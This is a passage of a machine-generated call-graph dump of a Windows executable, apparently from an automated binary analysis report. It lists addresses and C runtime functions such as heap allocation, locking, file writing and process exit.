13b171c 6688->6689 6690 13b1721 6688->6690 6692 13b1a75 __FF_MSGBANNER 58 API calls 6689->6692 6691 13b1ad2 __NMSG_WRITE 58 API calls 6690->6691 6693 13b1729 6691->6693 6692->6690 6694 13b17a8 _doexit 3 API calls 6693->6694 6695 13b1733 6694->6695 6695->6575 6697 13b1a75 __FF_MSGBANNER 58 API calls 6696->6697 6698 13b17c6 6697->6698 6699 13b1ad2 __NMSG_WRITE 58 API calls 6698->6699 6700 13b17ce 6699->6700 7784 
13b187c 6700->7784 6704 13b1932 _doexit 58 API calls 6703->6704 6705 13b1a70 6704->6705 6705->6602 6707 13b1932 _doexit 58 API calls 6706->6707 6708 13b17f4 6707->6708 6708->6605 6750 13b1767 6709->6750 6711 13b18a1 __init_pointers __initp_misc_winsig 6751 13b4995 EncodePointer 6711->6751 6713 13b18b9 __init_pointers 6714 13b4110 34 API calls 6713->6714 6714->6611 6716 13b456c 6715->6716 6718 13b381f 6716->6718 6752 13b40a2 6716->6752 6718->6614 6728 13b4001 6718->6728 6720 13b3895 6719->6720 6722 13b389b 6719->6722 6755 13b401f 6720->6755 6723 13b4479 DeleteCriticalSection 6722->6723 6724 13b4495 6722->6724 6758 13b4831 6723->6758 6726 13b44a1 DeleteCriticalSection 6724->6726 6727 13b3828 6724->6727 6726->6724 6727->6578 6729 13b4018 TlsAlloc 6728->6729 6730 13b3835 6728->6730 6730->6614 6730->6619 6734 13b4870 6731->6734 6733 13b384d 6733->6622 6737 13b405d 6733->6737 6734->6733 6735 13b488e 6734->6735 6784 13b74fd 6734->6784 6735->6733 6735->6734 6792 13b43a9 Sleep 6735->6792 6738 13b4073 6737->6738 6739 13b4077 TlsSetValue 6737->6739 6738->6625 6739->6625 6741 13b376e __initptd 6740->6741 6795 13b442f 6741->6795 6743 13b37ab 6802 13b3803 6743->6802 6746 13b442f __lock 58 API calls 6747 13b37cc ___addlocaleref 6746->6747 6805 13b380c 6747->6805 6749 13b37f7 __initptd 6749->6629 6750->6711 6751->6713 6753 13b40bf InitializeCriticalSectionAndSpinCount 6752->6753 6754 13b40b2 6752->6754 6753->6716 6754->6716 6756 13b4032 6755->6756 6757 13b4036 TlsFree 6755->6757 6756->6722 6757->6722 6759 13b483a HeapFree 6758->6759 6763 13b4863 __dosmaperr 6758->6763 6760 13b484f 6759->6760 6759->6763 6764 13b1cc3 6760->6764 6763->6722 6767 13b36f3 GetLastError 6764->6767 6766 13b1cc8 GetLastError 6766->6763 6781 13b403e 6767->6781 6769 13b3708 6770 13b3756 SetLastError 6769->6770 6771 13b4869 __calloc_crt 55 API calls 6769->6771 6770->6766 6772 13b371b 6771->6772 6772->6770 6773 13b405d __getptd_noexit TlsSetValue 6772->6773 6774 13b372f 6773->6774 6775 13b374d 6774->6775 6776 
13b3735 6774->6776 6778 13b4831 _free 55 API calls 6775->6778 6777 13b3762 __initptd 55 API calls 6776->6777 6779 13b373d GetCurrentThreadId 6777->6779 6780 13b3753 6778->6780 6779->6770 6780->6770 6782 13b4051 6781->6782 6783 13b4055 TlsGetValue 6781->6783 6782->6769 6783->6769 6785 13b7508 6784->6785 6790 13b7523 6784->6790 6786 13b7514 6785->6786 6785->6790 6787 13b1cc3 __cftog_l 57 API calls 6786->6787 6791 13b7519 6787->6791 6788 13b7533 HeapAlloc 6788->6790 6788->6791 6790->6788 6790->6791 6793 13b1741 DecodePointer 6790->6793 6791->6734 6792->6735 6794 13b1754 6793->6794 6794->6790 6796 13b4453 EnterCriticalSection 6795->6796 6797 13b4440 6795->6797 6796->6743 6808 13b44b7 6797->6808 6799 13b4446 6799->6796 6800 13b17be __lock 57 API calls 6799->6800 6801 13b4452 6800->6801 6801->6796 7002 13b4599 LeaveCriticalSection 6802->7002 6804 13b37c5 6804->6746 7003 13b4599 LeaveCriticalSection 6805->7003 6807 13b3813 6807->6749 6809 13b44c3 __initptd 6808->6809 6810 13b44cc 6809->6810 6811 13b44e4 6809->6811 6832 13b1a75 6810->6832 6819 13b4505 __initptd 6811->6819 6874 13b48b1 6811->6874 6817 13b450f 6822 13b442f __lock 58 API calls 6817->6822 6818 13b4500 6821 13b1cc3 __cftog_l 58 API calls 6818->6821 6819->6799 6821->6819 6824 13b4516 6822->6824 6826 13b453b 6824->6826 6827 13b4523 6824->6827 6829 13b4831 _free 58 API calls 6826->6829 6828 13b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6827->6828 6830 13b452f 6828->6830 6829->6830 6880 13b4557 6830->6880 6883 13b3e88 6832->6883 6834 13b1a7c 6835 13b1a89 6834->6835 6836 13b3e88 __NMSG_WRITE 58 API calls 6834->6836 6837 13b1ad2 __NMSG_WRITE 58 API calls 6835->6837 6839 13b1aab 6835->6839 6836->6835 6838 13b1aa1 6837->6838 6840 13b1ad2 __NMSG_WRITE 58 API calls 6838->6840 6841 13b1ad2 6839->6841 6840->6839 6842 13b1af0 __NMSG_WRITE 6841->6842 6843 13b3e88 __NMSG_WRITE 55 API calls 6842->6843 6870 13b1c17 6842->6870 6846 13b1b03 6843->6846 6845 13b1c80 6871 13b17a8 6845->6871 6847 13b1c1c GetStdHandle 
6846->6847 6848 13b3e88 __NMSG_WRITE 55 API calls 6846->6848 6851 13b1c2a _strlen 6847->6851 6847->6870 6849 13b1b14 6848->6849 6849->6847 6850 13b1b26 6849->6850 6850->6870 6913 13b5457 6850->6913 6853 13b1c63 WriteFile 6851->6853 6851->6870 6853->6870 6855 13b1b53 GetModuleFileNameW 6857 13b1b73 6855->6857 6863 13b1b83 __wsetenvp 6855->6863 6856 13b1c84 6858 13b1e99 __invoke_watson 8 API calls 6856->6858 6859 13b5457 __wsetenvp 55 API calls 6857->6859 6860 13b1c8e 6858->6860 6859->6863 6861 13b1bc9 6861->6856 6931 13b53eb 6861->6931 6863->6856 6863->6861 6922 13b54cc 6863->6922 6866 13b53eb __NMSG_WRITE 55 API calls 6867 13b1c00 6866->6867 6867->6856 6868 13b1c07 6867->6868 6940 13b558a EncodePointer 6868->6940 6965 13b5770 6870->6965 6980 13b1774 GetModuleHandleExW 6871->6980 6876 13b48bf 6874->6876 6877 13b44f9 6876->6877 6879 13b48d2 6876->6879 6983 13b1147 6876->6983 6877->6817 6877->6818 6879->6876 6879->6877 7000 13b43a9 Sleep 6879->7000 7001 13b4599 LeaveCriticalSection 6880->7001 6882 13b455e 6882->6819 6884 13b3e92 6883->6884 6885 13b1cc3 __cftog_l 58 API calls 6884->6885 6886 13b3e9c 6884->6886 6887 13b3eb8 6885->6887 6886->6834 6890 13b1e89 6887->6890 6893 13b1e5e DecodePointer 6890->6893 6894 13b1e71 6893->6894 6899 13b1e99 IsProcessorFeaturePresent 6894->6899 6897 13b1e5e __cftog_l 8 API calls 6898 13b1e95 6897->6898 6898->6834 6900 13b1ea4 6899->6900 6905 13b1d2c 6900->6905 6904 13b1e88 6904->6897 6906 13b1d46 _memset ___raise_securityfailure 6905->6906 6907 13b1d66 IsDebuggerPresent 6906->6907 6908 13b43cc ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 6907->6908 6910 13b1e2a ___raise_securityfailure 6908->6910 6909 13b5770 __atodbl_l 6 API calls 6911 13b1e4d 6909->6911 6910->6909 6912 13b43b7 GetCurrentProcess TerminateProcess 6911->6912 6912->6904 6914 13b5462 6913->6914 6915 13b5470 6913->6915 6914->6915 6918 13b5489 6914->6918 6916 13b1cc3 __cftog_l 58 API calls 6915->6916 6921 13b547a 6916->6921 6917 13b1e89 
__cftog_l 9 API calls 6919 13b1b46 6917->6919 6918->6919 6920 13b1cc3 __cftog_l 58 API calls 6918->6920 6919->6855 6919->6856 6920->6921 6921->6917 6925 13b54da 6922->6925 6923 13b54de 6924 13b1cc3 __cftog_l 58 API calls 6923->6924 6926 13b54e3 6923->6926 6930 13b550e 6924->6930 6925->6923 6925->6926 6927 13b551d 6925->6927 6926->6861 6927->6926 6929 13b1cc3 __cftog_l 58 API calls 6927->6929 6928 13b1e89 __cftog_l 9 API calls 6928->6926 6929->6930 6930->6928 6932 13b5405 6931->6932 6935 13b53f7 6931->6935 6933 13b1cc3 __cftog_l 58 API calls 6932->6933 6934 13b540f 6933->6934 6936 13b1e89 __cftog_l 9 API calls 6934->6936 6935->6932 6938 13b5431 6935->6938 6937 13b1be9 6936->6937 6937->6856 6937->6866 6938->6937 6939 13b1cc3 __cftog_l 58 API calls 6938->6939 6939->6934 6941 13b55be ___crtIsPackagedApp 6940->6941 6942 13b567d IsDebuggerPresent 6941->6942 6943 13b55cd LoadLibraryExW 6941->6943 6946 13b56a2 6942->6946 6947 13b5687 6942->6947 6944 13b560a GetProcAddress 6943->6944 6945 13b55e4 GetLastError 6943->6945 6951 13b561e 7 API calls 6944->6951 6953 13b569a 6944->6953 6950 13b55f3 LoadLibraryExW 6945->6950 6945->6953 6948 13b5695 6946->6948 6949 13b56a7 DecodePointer 6946->6949 6947->6948 6952 13b568e OutputDebugStringW 6947->6952 6948->6953 6959 13b56ce DecodePointer DecodePointer 6948->6959 6964 13b56e6 6948->6964 6949->6953 6950->6944 6950->6953 6954 13b567a 6951->6954 6955 13b5666 GetProcAddress EncodePointer 6951->6955 6952->6948 6956 13b5770 __atodbl_l 6 API calls 6953->6956 6954->6942 6955->6954 6960 13b576c 6956->6960 6957 13b571e DecodePointer 6958 13b570a DecodePointer 6957->6958 6961 13b5725 6957->6961 6958->6953 6959->6964 6960->6870 6961->6958 6963 13b5736 DecodePointer 6961->6963 6963->6958 6964->6957 6964->6958 6966 13b577a IsProcessorFeaturePresent 6965->6966 6967 13b5778 6965->6967 6969 13b7ae6 6966->6969 6967->6845 6972 13b7a95 IsDebuggerPresent 6969->6972 6973 13b7aaa ___raise_securityfailure 6972->6973 6978 13b43cc SetUnhandledExceptionFilter 
UnhandledExceptionFilter 6973->6978 6975 13b7ab2 ___raise_securityfailure 6979 13b43b7 GetCurrentProcess TerminateProcess 6975->6979 6977 13b7acf 6977->6845 6978->6975 6979->6977 6981 13b178d GetProcAddress 6980->6981 6982 13b179f ExitProcess 6980->6982 6981->6982 6984 13b11c2 6983->6984 6990 13b1153 6983->6990 6985 13b1741 _malloc DecodePointer 6984->6985 6986 13b11c8 6985->6986 6987 13b1cc3 __cftog_l 57 API calls 6986->6987 6999 13b11ba 6987->6999 6988 13b1a75 __FF_MSGBANNER 57 API calls 6993 13b115e 6988->6993 6989 13b1186 RtlAllocateHeap 6989->6990 6989->6999 6990->6989 6992 13b11ae 6990->6992 6990->6993 6994 13b1741 _malloc DecodePointer 6990->6994 6997 13b11ac 6990->6997 6991 13b1ad2 __NMSG_WRITE 57 API calls 6991->6993 6995 13b1cc3 __cftog_l 57 API calls 6992->6995 6993->6988 6993->6990 6993->6991 6996 13b17a8 _doexit 3 API calls 6993->6996 6994->6990 6995->6997 6996->6993 6998 13b1cc3 __cftog_l 57 API calls 6997->6998 6998->6999 6999->6876 7000->6879 7001->6882 7002->6804 7003->6807 7007 13b4599 LeaveCriticalSection 7004->7007 7006 13b3b5a 7006->6639 7007->7006 7009 13b4945 EncodePointer 7008->7009 7009->7009 7010 13b495f 7009->7010 7010->6676 7014 13b4720 7011->7014 7013 13b4827 7013->6678 7015 13b472c __initptd 7014->7015 7022 13b1920 7015->7022 7021 13b4753 __initptd 7021->7013 7023 13b442f __lock 58 API calls 7022->7023 7024 13b1927 7023->7024 7025 13b4764 DecodePointer DecodePointer 7024->7025 7026 13b4741 7025->7026 7027 13b4791 7025->7027 7036 13b475e 7026->7036 7027->7026 7039 13b7421 7027->7039 7029 13b47f4 EncodePointer EncodePointer 7029->7026 7030 13b47c8 7030->7026 7033 13b48f8 __realloc_crt 61 API calls 7030->7033 7034 13b47e2 EncodePointer 7030->7034 7031 13b47a3 7031->7029 7031->7030 7046 13b48f8 7031->7046 7035 13b47dc 7033->7035 7034->7029 7035->7026 7035->7034 7073 13b1929 7036->7073 7040 13b742a 7039->7040 7041 13b743f HeapSize 7039->7041 7042 13b1cc3 __cftog_l 58 API calls 7040->7042 7041->7031 7043 13b742f 7042->7043 7044 13b1e89 
__cftog_l 9 API calls 7043->7044 7045 13b743a 7044->7045 7045->7031 7049 13b48ff 7046->7049 7048 13b493c 7048->7030 7049->7048 7051 13b7452 7049->7051 7072 13b43a9 Sleep 7049->7072 7052 13b745b 7051->7052 7053 13b7466 7051->7053 7054 13b1147 _malloc 58 API calls 7052->7054 7055 13b746e 7053->7055 7066 13b747b 7053->7066 7057 13b7463 7054->7057 7056 13b4831 _free 58 API calls 7055->7056 7071 13b7476 __dosmaperr 7056->7071 7057->7049 7058 13b74b3 7060 13b1741 _malloc DecodePointer 7058->7060 7059 13b7483 HeapReAlloc 7059->7066 7059->7071 7061 13b74b9 7060->7061 7063 13b1cc3 __cftog_l 58 API calls 7061->7063 7062 13b74e3 7065 13b1cc3 __cftog_l 58 API calls 7062->7065 7063->7071 7064 13b1741 _malloc DecodePointer 7064->7066 7067 13b74e8 GetLastError 7065->7067 7066->7058 7066->7059 7066->7062 7066->7064 7068 13b74cb 7066->7068 7067->7071 7069 13b1cc3 __cftog_l 58 API calls 7068->7069 7070 13b74d0 GetLastError 7069->7070 7070->7071 7071->7049 7072->7049 7076 13b4599 LeaveCriticalSection 7073->7076 7075 13b1930 7075->7021 7076->7075 7083 13b11ee 7077->7083 7079 13b1025 VirtualAlloc 7080 13b147d 7079->7080 7599 13b1498 7080->7599 7082 13b1493 7082->6686 7086 13b11fa __initptd 7083->7086 7084 13b120d 7085 13b1cc3 __cftog_l 58 API calls 7084->7085 7087 13b1212 7085->7087 7086->7084 7088 13b123e 7086->7088 7089 13b1e89 __cftog_l 9 API calls 7087->7089 7102 13b2034 7088->7102 7099 13b121d __initptd @_EH4_CallFilterFunc@8 7089->7099 7091 13b1243 7092 13b1259 7091->7092 7093 13b124c 7091->7093 7095 13b1283 7092->7095 7096 13b1263 7092->7096 7094 13b1cc3 __cftog_l 58 API calls 7093->7094 7094->7099 7117 13b2153 7095->7117 7097 13b1cc3 __cftog_l 58 API calls 7096->7097 7097->7099 7099->7079 7103 13b2040 __initptd 7102->7103 7104 13b442f __lock 58 API calls 7103->7104 7115 13b204e 7104->7115 7105 13b20c2 7135 13b214a 7105->7135 7106 13b20c9 7107 13b48b1 __malloc_crt 58 API calls 7106->7107 7109 13b20d0 7107->7109 7109->7105 7111 13b40a2 __mtinitlocks 
InitializeCriticalSectionAndSpinCount 7109->7111 7110 13b213f __initptd 7110->7091 7114 13b20f6 EnterCriticalSection 7111->7114 7112 13b44b7 __mtinitlocknum 58 API calls 7112->7115 7114->7105 7115->7105 7115->7106 7115->7112 7138 13b1f9d 7115->7138 7143 13b2007 7115->7143 7126 13b2173 __wopenfile 7117->7126 7118 13b218d 7120 13b1cc3 __cftog_l 58 API calls 7118->7120 7119 13b2348 7119->7118 7123 13b23ab 7119->7123 7121 13b2192 7120->7121 7122 13b1e89 __cftog_l 9 API calls 7121->7122 7124 13b128e 7122->7124 7150 13b625f 7123->7150 7132 13b12b0 7124->7132 7126->7118 7126->7119 7153 13b62b3 7126->7153 7129 13b62b3 __wcsnicmp 60 API calls 7130 13b2360 7129->7130 7130->7119 7131 13b62b3 __wcsnicmp 60 API calls 7130->7131 7131->7119 7592 13b1fcd 7132->7592 7134 13b12b6 7134->7099 7148 13b4599 LeaveCriticalSection 7135->7148 7137 13b2151 7137->7110 7139 13b1fa8 7138->7139 7140 13b1fbe EnterCriticalSection 7138->7140 7141 13b442f __lock 58 API calls 7139->7141 7140->7115 7142 13b1fb1 7141->7142 7142->7115 7144 13b2028 LeaveCriticalSection 7143->7144 7145 13b2015 7143->7145 7144->7115 7149 13b4599 LeaveCriticalSection 7145->7149 7147 13b2025 7147->7115 7148->7137 7149->7147 7161 13b5a43 7150->7161 7152 13b6278 7152->7124 7154 13b6351 7153->7154 7155 13b62c5 7153->7155 7504 13b6369 7154->7504 7157 13b1cc3 __cftog_l 58 API calls 7155->7157 7160 13b2341 7155->7160 7158 13b62de 7157->7158 7159 13b1e89 __cftog_l 9 API calls 7158->7159 7159->7160 7160->7119 7160->7129 7164 13b5a4f __initptd 7161->7164 7162 13b5a65 7163 13b1cc3 __cftog_l 58 API calls 7162->7163 7165 13b5a6a 7163->7165 7164->7162 7166 13b5a9b 7164->7166 7167 13b1e89 __cftog_l 9 API calls 7165->7167 7172 13b5b0c 7166->7172 7171 13b5a74 __initptd 7167->7171 7169 13b5ab7 7246 13b5ae0 7169->7246 7171->7152 7173 13b5b2c 7172->7173 7250 13b8a18 7173->7250 7175 13b5c7f 7176 13b1e99 __invoke_watson 8 API calls 7175->7176 7177 13b625e 7176->7177 7179 13b5a43 __wsopen_helper 103 API calls 7177->7179 7178 13b5b48 7178->7175 
7180 13b5b82 7178->7180 7187 13b5ba5 7178->7187 7181 13b6278 7179->7181 7281 13b1c8f 7180->7281 7181->7169 7184 13b1cc3 __cftog_l 58 API calls 7185 13b5b94 7184->7185 7188 13b1e89 __cftog_l 9 API calls 7185->7188 7186 13b5c63 7189 13b1c8f __write 58 API calls 7186->7189 7187->7186 7194 13b5c41 7187->7194 7190 13b5b9e 7188->7190 7191 13b5c68 7189->7191 7190->7169 7192 13b1cc3 __cftog_l 58 API calls 7191->7192 7193 13b5c75 7192->7193 7195 13b1e89 __cftog_l 9 API calls 7193->7195 7257 13b6d16 7194->7257 7195->7175 7197 13b5d0f 7198 13b5d19 7197->7198 7199 13b5d3c 7197->7199 7201 13b1c8f __write 58 API calls 7198->7201 7275 13b59bb 7199->7275 7202 13b5d1e 7201->7202 7203 13b1cc3 __cftog_l 58 API calls 7202->7203 7205 13b5d28 7203->7205 7204 13b5ddc GetFileType 7206 13b5e29 7204->7206 7207 13b5de7 GetLastError 7204->7207 7209 13b1cc3 __cftog_l 58 API calls 7205->7209 7289 13b6fac 7206->7289 7210 13b1ca2 __dosmaperr 58 API calls 7207->7210 7208 13b5daa GetLastError 7284 13b1ca2 7208->7284 7209->7190 7213 13b5e0e CloseHandle 7210->7213 7215 13b5dcf 7213->7215 7216 13b5e1c 7213->7216 7214 13b59bb ___createFile 3 API calls 7217 13b5d9f 7214->7217 7219 13b1cc3 __cftog_l 58 API calls 7215->7219 7220 13b1cc3 __cftog_l 58 API calls 7216->7220 7217->7204 7217->7208 7219->7175 7221 13b5e21 7220->7221 7221->7215 7223 13b6002 7223->7175 7225 13b61d5 CloseHandle 7223->7225 7227 13b59bb ___createFile 3 API calls 7225->7227 7228 13b61fc 7227->7228 7231 13b6204 GetLastError 7228->7231 7245 13b608c 7228->7245 7229 13b1c8f __write 58 API calls 7241 13b5ec8 7229->7241 7230 13b2a2a 70 API calls __read_nolock 7230->7241 7232 13b1ca2 __dosmaperr 58 API calls 7231->7232 7234 13b6210 7232->7234 7233 13b5ed0 7233->7241 7307 13b897e 7233->7307 7322 13b86ed 7233->7322 7381 13b6ebf 7234->7381 7239 13b607f 7240 13b897e __close_nolock 61 API calls 7239->7240 7242 13b6086 7240->7242 7241->7223 7241->7230 7241->7233 7241->7239 7243 13b7054 60 API calls __lseeki64_nolock 7241->7243 7353 13b7d99 
7241->7353 7244 13b1cc3 __cftog_l 58 API calls 7242->7244 7243->7241 7244->7245 7245->7175 7247 13b5b0a 7246->7247 7248 13b5ae6 7246->7248 7247->7171 7503 13b702e LeaveCriticalSection 7248->7503 7251 13b8a22 7250->7251 7252 13b8a37 7250->7252 7253 13b1cc3 __cftog_l 58 API calls 7251->7253 7252->7178 7254 13b8a27 7253->7254 7255 13b1e89 __cftog_l 9 API calls 7254->7255 7256 13b8a32 7255->7256 7256->7178 7258 13b6d22 __initptd 7257->7258 7259 13b44b7 __mtinitlocknum 58 API calls 7258->7259 7260 13b6d33 7259->7260 7261 13b442f __lock 58 API calls 7260->7261 7263 13b6d38 __initptd 7260->7263 7262 13b6d46 7261->7262 7265 13b6e26 7262->7265 7267 13b6dc6 EnterCriticalSection 7262->7267 7268 13b442f __lock 58 API calls 7262->7268 7273 13b6e94 7262->7273 7274 13b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 7262->7274 7390 13b6dee 7262->7390 7263->7197 7266 13b4869 __calloc_crt 58 API calls 7265->7266 7270 13b6e2f 7266->7270 7267->7262 7269 13b6dd6 LeaveCriticalSection 7267->7269 7268->7262 7269->7262 7270->7273 7393 13b6c88 7270->7393 7402 13b6eb6 7273->7402 7274->7262 7276 13b59c6 ___crtIsPackagedApp 7275->7276 7277 13b59ca GetModuleHandleW GetProcAddress 7276->7277 7278 13b5a21 CreateFileW 7276->7278 7280 13b59e7 7277->7280 7279 13b5a3f 7278->7279 7279->7204 7279->7208 7279->7214 7280->7279 7282 13b36f3 __getptd_noexit 58 API calls 7281->7282 7283 13b1c94 7282->7283 7283->7184 7285 13b1c8f __write 58 API calls 7284->7285 7286 13b1cab __dosmaperr 7285->7286 7287 13b1cc3 __cftog_l 58 API calls 7286->7287 7288 13b1cbe 7287->7288 7288->7215 7290 13b6fb8 7289->7290 7291 13b7014 7289->7291 7290->7291 7296 13b6fda 7290->7296 7292 13b1cc3 __cftog_l 58 API calls 7291->7292 7293 13b7019 7292->7293 7294 13b1c8f __write 58 API calls 7293->7294 7295 13b5e47 7294->7295 7295->7223 7295->7241 7298 13b7054 7295->7298 7296->7295 7297 13b6fff SetStdHandle 7296->7297 7297->7295 7410 13b6f45 7298->7410 7300 13b7064 7301 13b707d SetFilePointerEx 7300->7301 7302 13b706c 7300->7302 
7304 13b7095 GetLastError 7301->7304 7305 13b5eb1 7301->7305 7303 13b1cc3 __cftog_l 58 API calls 7302->7303 7303->7305 7306 13b1ca2 __dosmaperr 58 API calls 7304->7306 7305->7229 7305->7241 7306->7305 7308 13b6f45 __close_nolock 58 API calls 7307->7308 7311 13b898c 7308->7311 7309 13b89e2 7310 13b6ebf __free_osfhnd 59 API calls 7309->7310 7315 13b89ea 7310->7315 7311->7309 7312 13b89c0 7311->7312 7313 13b6f45 __close_nolock 58 API calls 7311->7313 7312->7309 7314 13b6f45 __close_nolock 58 API calls 7312->7314 7316 13b89b7 7313->7316 7317 13b89cc CloseHandle 7314->7317 7318 13b8a0c 7315->7318 7321 13b1ca2 __dosmaperr 58 API calls 7315->7321 7319 13b6f45 __close_nolock 58 API calls 7316->7319 7317->7309 7320 13b89d8 GetLastError 7317->7320 7318->7233 7319->7312 7320->7309 7321->7318 7323 13b7054 __lseeki64_nolock 60 API calls 7322->7323 7324 13b870a 7323->7324 7325 13b876f 7324->7325 7327 13b7054 __lseeki64_nolock 60 API calls 7324->7327 7326 13b1cc3 __cftog_l 58 API calls 7325->7326 7328 13b877a 7325->7328 7326->7328 7331 13b8726 7327->7331 7328->7233 7329 13b880e 7332 13b8874 7329->7332 7335 13b7054 __lseeki64_nolock 60 API calls 7329->7335 7330 13b874f GetProcessHeap HeapAlloc 7333 13b876a 7330->7333 7343 13b8783 __setmode_nolock 7330->7343 7331->7325 7331->7329 7331->7330 7332->7325 7334 13b7054 __lseeki64_nolock 60 API calls 7332->7334 7336 13b1cc3 __cftog_l 58 API calls 7333->7336 7334->7325 7337 13b8826 7335->7337 7336->7325 7337->7325 7338 13b6f45 __close_nolock 58 API calls 7337->7338 7339 13b883a SetEndOfFile 7338->7339 7339->7332 7340 13b885a 7339->7340 7342 13b1cc3 __cftog_l 58 API calls 7340->7342 7344 13b885f 7342->7344 7345 13b87d4 7343->7345 7348 13b87e3 __setmode_nolock 7343->7348 7423 13b7e88 7343->7423 7347 13b1c8f __write 58 API calls 7344->7347 7346 13b1c8f __write 58 API calls 7345->7346 7349 13b87d9 7346->7349 7350 13b886a GetLastError 7347->7350 7351 13b87f8 GetProcessHeap HeapFree 7348->7351 7349->7348 7352 13b1cc3 __cftog_l 58 API calls 
7349->7352 7350->7332 7351->7332 7352->7348 7354 13b7da5 __initptd 7353->7354 7355 13b7dc9 7354->7355 7356 13b7db2 7354->7356 7357 13b7e68 7355->7357 7359 13b7ddd 7355->7359 7358 13b1c8f __write 58 API calls 7356->7358 7360 13b1c8f __write 58 API calls 7357->7360 7361 13b7db7 7358->7361 7362 13b7dfb 7359->7362 7363 13b7e05 7359->7363 7364 13b7e00 7360->7364 7365 13b1cc3 __cftog_l 58 API calls 7361->7365 7366 13b1c8f __write 58 API calls 7362->7366 7367 13b6c88 ___lock_fhandle 59 API calls 7363->7367 7369 13b1cc3 __cftog_l 58 API calls 7364->7369 7376 13b7dbe __initptd 7365->7376 7366->7364 7368 13b7e0b 7367->7368 7370 13b7e1e 7368->7370 7371 13b7e31 7368->7371 7372 13b7e74 7369->7372 7373 13b7e88 __write_nolock 76 API calls 7370->7373 7375 13b1cc3 __cftog_l 58 API calls 7371->7375 7374 13b1e89 __cftog_l 9 API calls 7372->7374 7377 13b7e2a 7373->7377 7374->7376 7378 13b7e36 7375->7378 7376->7241 7499 13b7e60 7377->7499 7379 13b1c8f __write 58 API calls 7378->7379 7379->7377 7382 13b6f2b 7381->7382 7383 13b6ecb 7381->7383 7384 13b1cc3 __cftog_l 58 API calls 7382->7384 7383->7382 7389 13b6ef4 7383->7389 7385 13b6f30 7384->7385 7386 13b1c8f __write 58 API calls 7385->7386 7387 13b6f1c 7386->7387 7387->7245 7388 13b6f16 SetStdHandle 7388->7387 7389->7387 7389->7388 7405 13b4599 LeaveCriticalSection 7390->7405 7392 13b6df5 7392->7262 7394 13b6c94 __initptd 7393->7394 7395 13b6ce3 EnterCriticalSection 7394->7395 7397 13b442f __lock 58 API calls 7394->7397 7396 13b6d09 __initptd 7395->7396 7396->7273 7398 13b6cb9 7397->7398 7399 13b6cd1 7398->7399 7400 13b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 7398->7400 7406 13b6d0d 7399->7406 7400->7399 7409 13b4599 LeaveCriticalSection 7402->7409 7404 13b6ebd 7404->7263 7405->7392 7407 13b4599 _doexit LeaveCriticalSection 7406->7407 7408 13b6d14 7407->7408 7408->7395 7409->7404 7411 13b6f50 7410->7411 7413 13b6f65 7410->7413 7412 13b1c8f __write 58 API calls 7411->7412 7415 13b6f55 7412->7415 7414 13b1c8f __write 58 
API calls 7413->7414 7416 13b6f8a 7413->7416 7417 13b6f94 7414->7417 7418 13b1cc3 __cftog_l 58 API calls 7415->7418 7416->7300 7419 13b1cc3 __cftog_l 58 API calls 7417->7419 7420 13b6f5d 7418->7420 7421 13b6f9c 7419->7421 7420->7300 7422 13b1e89 __cftog_l 9 API calls 7421->7422 7422->7420 7424 13b7e95 __write_nolock 7423->7424 7425 13b7ef3 7424->7425 7426 13b7ed4 7424->7426 7468 13b7ec9 7424->7468 7429 13b7f4b 7425->7429 7430 13b7f2f 7425->7430 7428 13b1c8f __write 58 API calls 7426->7428 7427 13b5770 __atodbl_l 6 API calls 7431 13b86e9 7427->7431 7432 13b7ed9 7428->7432 7434 13b7f64 7429->7434 7437 13b7054 __lseeki64_nolock 60 API calls 7429->7437 7433 13b1c8f __write 58 API calls 7430->7433 7431->7343 7435 13b1cc3 __cftog_l 58 API calls 7432->7435 7436 13b7f34 7433->7436 7482 13b6c34 7434->7482 7438 13b7ee0 7435->7438 7440 13b1cc3 __cftog_l 58 API calls 7436->7440 7437->7434 7441 13b1e89 __cftog_l 9 API calls 7438->7441 7444 13b7f3b 7440->7444 7441->7468 7442 13b7f72 7443 13b82cb 7442->7443 7491 13b36db 7442->7491 7445 13b82e9 7443->7445 7446 13b865e WriteFile 7443->7446 7447 13b1e89 __cftog_l 9 API calls 7444->7447 7449 13b840d 7445->7449 7465 13b82ff 7445->7465 7450 13b82be GetLastError 7446->7450 7455 13b828b 7446->7455 7447->7468 7452 13b8418 7449->7452 7453 13b8502 7449->7453 7450->7455 7452->7455 7460 13b8697 7452->7460 7466 13b847d WriteFile 7452->7466 7453->7455 7453->7460 7464 13b8577 WideCharToMultiByte 7453->7464 7472 13b85c6 WriteFile 7453->7472 7454 13b7fdd 7454->7443 7456 13b7fed GetConsoleCP 7454->7456 7459 13b83eb 7455->7459 7455->7460 7455->7468 7456->7460 7480 13b801c 7456->7480 7457 13b836e WriteFile 7457->7450 7457->7465 7458 13b1cc3 __cftog_l 58 API calls 7461 13b86c5 7458->7461 7462 13b868e 7459->7462 7463 13b83f6 7459->7463 7460->7458 7460->7468 7467 13b1c8f __write 58 API calls 7461->7467 7470 13b1ca2 __dosmaperr 58 API calls 7462->7470 7469 13b1cc3 __cftog_l 58 API calls 7463->7469 7464->7450 7464->7453 7465->7455 7465->7457 7465->7460 
7466->7450 7466->7452 7467->7468 7468->7427 7471 13b83fb 7469->7471 7470->7468 7473 13b1c8f __write 58 API calls 7471->7473 7472->7453 7475 13b8619 GetLastError 7472->7475 7473->7468 7475->7453 7476 13b92d3 WriteConsoleW CreateFileW __putwch_nolock 7476->7480 7477 13b92bb 60 API calls __write_nolock 7477->7480 7478 13b8105 WideCharToMultiByte 7478->7455 7479 13b8140 WriteFile 7478->7479 7479->7450 7479->7480 7480->7450 7480->7455 7480->7476 7480->7477 7480->7478 7481 13b819a WriteFile 7480->7481 7496 13b91b5 7480->7496 7481->7450 7481->7480 7483 13b6c3f 7482->7483 7484 13b6c4c 7482->7484 7485 13b1cc3 __cftog_l 58 API calls 7483->7485 7486 13b6c58 7484->7486 7487 13b1cc3 __cftog_l 58 API calls 7484->7487 7488 13b6c44 7485->7488 7486->7442 7489 13b6c79 7487->7489 7488->7442 7490 13b1e89 __cftog_l 9 API calls 7489->7490 7490->7488 7492 13b36f3 __getptd_noexit 58 API calls 7491->7492 7493 13b36e1 7492->7493 7494 13b36ee GetConsoleMode 7493->7494 7495 13b17be __lock 58 API calls 7493->7495 7494->7443 7494->7454 7495->7494 7497 13b917b __isleadbyte_l 58 API calls 7496->7497 7498 13b91c2 7497->7498 7498->7480 7502 13b702e 